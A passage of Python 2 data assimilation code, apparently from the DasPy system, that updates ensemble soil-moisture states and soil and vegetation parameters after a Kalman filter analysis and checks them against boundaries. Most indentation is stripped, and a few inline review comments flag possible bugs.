localization_map_col[i] = localization_map[i]
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[0:State_DIM_Single_Layer,Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if Def_Print:
print "******************************************************** Update Prop_Grid_Array_Sys_parm_infl"
Analysis_Grid_Col = Analysis_Grid.flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer)],dtype=numpy.float32)
Prop_Grid_Array_Sys_parm_infl[:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
            else:
                # Parameter Estimation: xa is the augmented analysis where segment 0
                # is the state and segments 1..N hold the optimized parameters
                # (see the (Par_Index_Sub+1)*State_DIM_Single_Layer slices below).
                # NOTE(review): xm and localization_map_col are computed here but not
                # used anywhere in this branch's visible code — possibly dead
                # diagnostics; confirm before removing.
                xm = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
                localization_map_col = numpy.zeros(State_DIM_Single_Layer,dtype=numpy.float32)
                for i in range(State_DIM_Single_Layer):
                    xm[i] = numpy.mean(xa[i, :])
                    localization_map_col[i] = localization_map[i]
if Soil_Par_Sens_Dim >= 1:
# Assign the Optimized Parameters to Model Input
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par-1):
if Soil_Par_Sens[Par_Index]:
for Ens_Index in range(Ensemble_Number):
xa_temp = xa[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer),Ens_Index]
Analysis_Grid_Col = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa_temp,dtype=numpy.float32)
Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
#Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:] = imadjust.imadjust(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:],numpy.min(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]),numpy.max(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]),Parameter_Min_Max[Par_Index,0],Parameter_Min_Max[Par_Index,1])
parm_infl_temp = parm_infl[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer)]
Analysis_Grid_Col = Parameter_Soil_Space_parm_infl[Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl_temp,dtype=numpy.float32)
Parameter_Soil_Space_parm_infl[Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Par_Index_Sub += 1
                    if Soil_Par_Sens[Dim_Soil_Par-1]:
                        # Last soil parameter — presumably soil color, given the integer
                        # rounding and 1..20 clamping applied to it further below; confirm.
                        # NOTE(review): Ens_Index and Par_Index here are leftovers from the
                        # loops above (their final values), not loop variables — as written,
                        # a single ensemble member's analysis slice is read and then
                        # broadcast to ALL members on the last line.  Verify this is
                        # intended and not a missing per-ensemble loop.
                        xa_temp = xa[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer),Ens_Index]
                        Analysis_Grid_Col = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:].flatten()
                        Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa_temp,dtype=numpy.float32)
                        #print "data_matrix[Min_Index,:]",data_matrix[Min_Index,:]
                        #print "Low_Tail, High_Tail",Low_Tail, High_Tail, data_matrix[Min_Index,-2]+2
                        # Deterministic reseed keyed to the simulation day.
                        # NOTE(review): string.atoi is deprecated even in Python 2 — int()
                        # would do; also no random draw occurs before the next reseed below.
                        numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)))
                        Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
# Soil Boundary Check
Par_Index_Sub = 0
for Par_Index in range(Dim_Soil_Par):
if Soil_Par_Sens[Par_Index]:
# Remove the outliers based on the ensemble median
Parameter_Soil_Space_Ensemble_Median = numpy.median(Parameter_Soil_Space_Ensemble[:,Par_Index,:,:],axis=0)
Parameter_Soil_Space_Ensemble_Max = Parameter_Soil_Space_Ensemble_Median + Par_Soil_Uniform_STD[Par_Index_Sub]/(numpy.sqrt(1/12.0)*2.0)
Parameter_Soil_Space_Ensemble_Min = 2.0 * Parameter_Soil_Space_Ensemble_Median - Parameter_Soil_Space_Ensemble_Max
for Ens_Index in range(Ensemble_Number):
numexpr_a = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_Soil_Space_Ensemble_Min
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_Soil_Space_Ensemble_Max
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Lower_Boundary_Ens = numpy.random.uniform(1.0,High_Ratio_Par,size=numpy.shape(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:][Lower_Index] = numpy.multiply(Lower_Boundary_Ens[Lower_Index],Parameter_Soil_Space_Ensemble_Min[Lower_Index])
del Lower_Boundary_Ens
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Upper_Boundary_Ens = numpy.random.uniform(Low_Ratio_Par,1.0,size=numpy.shape(Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:]))
Parameter_Soil_Space_Ensemble[Ens_Index,Par_Index,:,:][Upper_Index] = numpy.multiply(Upper_Boundary_Ens[Upper_Index],Parameter_Soil_Space_Ensemble_Max[Upper_Index])
del Upper_Boundary_Ens
del Parameter_Soil_Space_Ensemble_Median,Parameter_Soil_Space_Ensemble_Max,Parameter_Soil_Space_Ensemble_Min
# Boundary Check
numexpr_a = Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_Soil[0,Par_Index]
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_Soil[1,Par_Index]
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Upper = Parameter_Range_Soil[0,Par_Index] + Par_Soil_Uniform_STD[Par_Index_Sub]
Upper = Parameter_Range_Soil[0,Par_Index] + Par_Soil_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Lower_Boundary_Ens = numpy.random.uniform(Parameter_Range_Soil[0,Par_Index],Upper,size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_Soil_Space_Ensemble[:,Par_Index,:,:][Lower_Index] = Lower_Boundary_Ens[Lower_Index]
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Lower = Parameter_Range_Soil[1,Par_Index] - Par_Soil_Uniform_STD[Par_Index_Sub]
Lower = Parameter_Range_Soil[1,Par_Index] - Par_Soil_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Upper_Boundary_Ens = numpy.random.uniform(Lower,Parameter_Range_Soil[1,Par_Index],size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Par_Index,:,:]))
Parameter_Soil_Space_Ensemble[:,Par_Index,:,:][Upper_Index] = Upper_Boundary_Ens[Upper_Index]
Par_Index_Sub = Par_Index_Sub + 1
if Soil_Par_Sens[Dim_Soil_Par-1]:
Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:] = numpy.asarray(numpy.round(Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]),dtype=numpy.integer)
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)))
Lower_Boundary_Ens = numpy.random.randint(1,3,size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]))
numexpr_a = Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]
numexpr_b = 1
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:][Lower_Index] = Lower_Boundary_Ens[Lower_Index]
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)))
Upper_Boundary_Ens = numpy.random.randint(1,3,size=numpy.shape(Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]))
numexpr_a = Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:]
numexpr_b = 20
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
Parameter_Soil_Space_Ensemble[:,Dim_Soil_Par-1,:,:][Upper_Index] = Upper_Boundary_Ens[Upper_Index]
del Lower_Boundary_Ens,Upper_Boundary_Ens
#for Soil_Layer_Index_Sub in range(Dim_Soil_Par):
# print "*****************************2"
# print numpy.min(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:]),numpy.max(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:])
if Def_ParFor:
Parameter_Soil_Space_Ensemble = ParFor_Texture_Check(Dim_Soil_Par, Ensemble_Number, Row_Numbers, Col_Numbers, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum, Parameter_Soil_Space_Ensemble, DAS_Depends_Path, omp_get_num_procs_ParFor)
else:
for Ens_Index in range(Ensemble_Number):
# Soil Texture Boundary Check
for Row_Index in range(Row_Numbers):
for Col_Index in range(Col_Numbers):
# if Sand + Clay is greater than their sum
for Soil_Layer_Index_Sub in range(Soil_Texture_Layer_Opt_Num):
Texture_Sum = (Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index] + Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub+Soil_Texture_Layer_Opt_Num,Row_Index,Col_Index])
if Texture_Sum > 98.0:
Ratio = Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index] / (Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index]+Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub+Soil_Texture_Layer_Opt_Num,Row_Index,Col_Index])
Diff = Texture_Sum - 98.0
Diff_Part1 = Ratio*Diff
Diff_Part2 = Diff - Diff_Part1
Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,Row_Index,Col_Index] -= Diff_Part1
Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub+Soil_Texture_Layer_Opt_Num,Row_Index,Col_Index] -= Diff_Part2
del Texture_Sum,Ratio,Diff,Diff_Part1,Diff_Part2
#for Soil_Layer_Index_Sub in range(Dim_Soil_Par):
# print "*****************************3"
# print numpy.min(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:]),numpy.max(Parameter_Soil_Space_Ensemble[Ens_Index,Soil_Layer_Index_Sub,:,:])
numexpr_a = Parameter_Soil_Space_Ensemble[:,2*Soil_Texture_Layer_Opt_Num:3*Soil_Texture_Layer_Opt_Num,:,:]
numexpr_b = 130.0
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Parameter_Soil_Space_Ensemble[:,2*Soil_Texture_Layer_Opt_Num:3*Soil_Texture_Layer_Opt_Num,:,:][numexpr_c] = 130.0
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
if PFT_Par_Sens_Dim >= 1:
print "Assign the Optimized PFT Parameters to Model Input\n"
#print numpy.shape(Parameter_PFT_Space_Ensemble)
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
for Ens_Index in range(Ensemble_Number):
xa_temp = xa[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer),Ens_Index]
Analysis_Grid_Col = Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa_temp,dtype=numpy.float32)
Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
#Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:] = imadjust.imadjust(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:],numpy.min(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]),numpy.max(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]),Parameter_Min_Max[Par_Index,0],Parameter_Min_Max[Par_Index,1])
parm_infl_temp = parm_infl[((Par_Index_Sub+1)*State_DIM_Single_Layer):((Par_Index_Sub+2)*State_DIM_Single_Layer)]
Analysis_Grid_Col = Parameter_PFT_Space_parm_infl[Par_Index,:,:].flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(parm_infl_temp,dtype=numpy.float32)
Parameter_PFT_Space_parm_infl[Par_Index,:,:] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
Par_Index_Sub += 1
# Hard Boundary Check
Par_Index_Sub = 0
for Par_Index in range(Dim_PFT_Par):
if PFT_Par_Sens[Par_Index]:
# Remove the outliers based on the ensemble median
Parameter_PFT_Space_Ensemble_Median = numpy.median(Parameter_PFT_Space_Ensemble[:,Par_Index,:,:],axis=0)
Parameter_PFT_Space_Ensemble_Max = Parameter_PFT_Space_Ensemble_Median + Par_PFT_Uniform_STD[Par_Index_Sub]/(numpy.sqrt(1/12.0)*2.0)
Parameter_PFT_Space_Ensemble_Min = 2.0 * Parameter_PFT_Space_Ensemble_Median - Parameter_PFT_Space_Ensemble_Max
for Ens_Index in range(Ensemble_Number):
numexpr_a = Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_PFT_Space_Ensemble_Min
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]
numexpr_b = Parameter_PFT_Space_Ensemble_Max
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Lower_Boundary_Ens = numpy.random.uniform(1.0,High_Ratio_Par,size=numpy.shape(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:][Lower_Index] = numpy.multiply(Lower_Boundary_Ens[Lower_Index],Parameter_PFT_Space_Ensemble_Min[Lower_Index])
del Lower_Boundary_Ens
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)+str(Ens_Index)))
Upper_Boundary_Ens = numpy.random.uniform(Low_Ratio_Par,1.0,size=numpy.shape(Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:]))
Parameter_PFT_Space_Ensemble[Ens_Index,Par_Index,:,:][Upper_Index] = numpy.multiply(Upper_Boundary_Ens[Upper_Index],Parameter_PFT_Space_Ensemble_Max[Upper_Index])
del Upper_Boundary_Ens
del Parameter_PFT_Space_Ensemble_Median,Parameter_PFT_Space_Ensemble_Max,Parameter_PFT_Space_Ensemble_Min
# Boundary Check
numexpr_a = Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_PFT[0,Par_Index]
numexpr_c = numpy.where(numexpr_a < numexpr_b)
Lower_Index = numexpr_c
numexpr_a = Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]
numexpr_b = Parameter_Range_PFT[1,Par_Index]
numexpr_c = numpy.where(numexpr_a > numexpr_b)
Upper_Index = numexpr_c
if numpy.size(Lower_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Upper = Parameter_Range_PFT[0,Par_Index] + Par_PFT_Uniform_STD[Par_Index_Sub]
Upper = Parameter_Range_PFT[0,Par_Index] + Par_PFT_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Lower_Boundary_Ens = numpy.random.uniform(Parameter_Range_PFT[0,Par_Index],Upper,size=numpy.shape(Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]))
#print numpy.shape(Lower_Index),numpy.shape(Lower_Boundary_Ens)
Parameter_PFT_Space_Ensemble[:,Par_Index,:,:][Lower_Index] = Lower_Boundary_Ens[Lower_Index]
if numpy.size(Upper_Index) > 1:
numpy.random.seed(seed=string.atoi(str((Datetime_Start - Datetime_Initial).days)+str(Par_Index)))
#Lower = Parameter_Range_PFT[1,Par_Index] - Par_PFT_Uniform_STD[Par_Index_Sub]
Lower = Parameter_Range_PFT[1,Par_Index] - Par_PFT_Uniform_STD[Par_Index_Sub] / numpy.sqrt(1.0/12.0)
Upper_Boundary_Ens = numpy.random.uniform(Lower,Parameter_Range_PFT[1,Par_Index],size=numpy.shape(Parameter_PFT_Space_Ensemble[:,Par_Index,:,:]))
Parameter_PFT_Space_Ensemble[:,Par_Index,:,:][Upper_Index] = Upper_Boundary_Ens[Upper_Index]
Par_Index_Sub = Par_Index_Sub + 1
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Col = Analysis_Grid_Array[Ens_Index,::].flatten()
# #print numpy.shape(Analysis_Grid_Col[~Mask_Index_Single_Layer]),numpy.shape(xa[:,Ens_Index])
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xa[(0*State_DIM_Single_Layer):((0+1)*State_DIM_Single_Layer),Ens_Index],dtype=numpy.float32)
#print Analysis_Grid_Col[~Mask_Index]
#Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.mean(numpy.asarray(xa[:,:]),axis=1) * Random_Factor_Normal[Ens_Index]
Analysis_Grid_Array[Ens_Index,::][::] = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
#if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_Parameter.txt', xm)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_Ens_Parameter.txt', xa)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Innovation_Parameter.txt',numpy.mean(innovation,axis=1))
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Increments_Parameter.txt',numpy.mean(increments,axis=1))
#if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_State.txt', xm)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Localization_map_col.txt', localization_map_col)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Analysis_Ens_State.txt', xa)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Bias_Analysis_State.txt', bias_a)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Innovation_State.txt',numpy.mean(innovation,axis=1))
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/'+DateString_Plot+'Increments_State.txt',numpy.mean(increments,axis=1))
for Ens_Index in range(Ensemble_Number):
Innovation_State_Col = Innovation_State[Ens_Index,:,:].flatten()
Innovation_State_Col[Obs_Index] = numpy.asarray(innovation[0:ny,Ens_Index],dtype=numpy.float32)
Innovation_State[Ens_Index,:,:] = numpy.reshape(Innovation_State_Col, (Row_Numbers, -1))
Increments_State_Col = Increments_State[Ens_Index,:,:].flatten()
Increments_State_Col[~Mask_Index_Single_Layer] = numpy.asarray(increments[0:State_DIM_Single_Layer,Ens_Index],dtype=numpy.float32)
Increments_State[Ens_Index,:,:] = numpy.reshape(Increments_State_Col, (Row_Numbers, -1))
del Innovation_State_Col,Increments_State_Col
#os.abort()
#Analysis_Grid[:,:] = (CLM_Soil_Moisture[:,:,0]+Observation_Matrix[:,:])/2.0
#Analysis_Grid[:, :] = Prop_Grid_Array_Sys[:,:]
Analysis_Grid_Col = Analysis_Grid.flatten()
Analysis_Grid_Col[~Mask_Index_Single_Layer] = numpy.asarray(xm,dtype=numpy.float32)
Analysis_Grid = numpy.reshape(Analysis_Grid_Col, (Row_Numbers, -1))
del Analysis_Grid_Col
Localization_Map_Mask = numpy.zeros_like(Analysis_Grid)
Localization_Map_Mask_Col = Localization_Map_Mask.flatten()
Localization_Map_Mask_Col[~Mask_Index_Single_Layer] = localization_map_col
Localization_Map_Mask = numpy.reshape(Localization_Map_Mask_Col, (Row_Numbers, -1))
del Localization_Map_Mask_Col
xm = []
xa_temp = []
localization_map_col = []
Lower_Index = []
Upper_Index = []
parm_infl_temp = []
Lower_Boundary_Ens = []
Upper_Boundary_Ens = []
numexpr_a = Land_Mask_Data
numexpr_b = NAvalue
numexpr_c = numpy.where(numexpr_a == numexpr_b)
NA_Index_Analysis_Grid = numexpr_c
if Def_Print >= 2:
print "NA_Index_Analysis_Grid",NA_Index_Analysis_Grid
# print numpy.min(Analysis_Grid),numpy.max(Analysis_Grid)
# print numpy.min(Teta_Residual[Soil_Layer_Index_DA,::]),numpy.max(Teta_Saturated[Soil_Layer_Index_DA,::])
if Write_DA_File_Flag:
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Analysis_Grid.txt', Analysis_Grid)
numpy.savetxt(DasPy_Path+'Analysis/DAS_Temp/Localization_Map_Mask.txt', Localization_Map_Mask)
if (not Parameter_Optimization_Flag) and (not ((numpy.size(numpy.where(Bias_Estimation_Option_Model == 1)) >= 1) or (numpy.size(numpy.where(Bias_Estimation_Option_Obs == 1)) >= 1))):
# State Estimation
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, Analysis_Grid, NA_Flag, SensorVariable, Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
#print numpy.min(Analysis_Grid)
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
for Ens_Index in range(Ensemble_Number):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, Analysis_Grid_Array[Ens_Index,::], NA_Flag, SensorVariable, Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Soil_Moisture":
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, SensorVariable, Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for Ens_Index in range(Ensemble_Number):
#CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = Analysis_Grid_Array[Ens_Index,::]
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Vegetation_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
for Soil_Layer_Index in range(Soil_Layer_Num):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if (Variable_Assimilation_Flag[Variable_List.index(SensorVariable)] and SensorVariable == "Surface_Temperature"):
if Def_Print:
print "Check the Ourliers"
NA_Flag = False
for Ens_Index in range(Ensemble_Number):
#CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index] = Analysis_Grid_Array[Ens_Index,::]
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Ground_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Vegetation_Temperature_Ensemble_Mat[:,:,Ens_Index], NA_Flag, 'Vegetation_Temperature', Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index_DA,:,:], Teta_Saturated[Soil_Layer_Index_DA,:,:], Teta_Field_Capacity[Soil_Layer_Index_DA,:,:], Teta_Wilting_Point[Soil_Layer_Index_DA,:,:], NAvalue)
for Soil_Layer_Index in range(Soil_Layer_Num):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, 'Soil_Temperature', Variable_Assimilation_Flag, Variable_List,
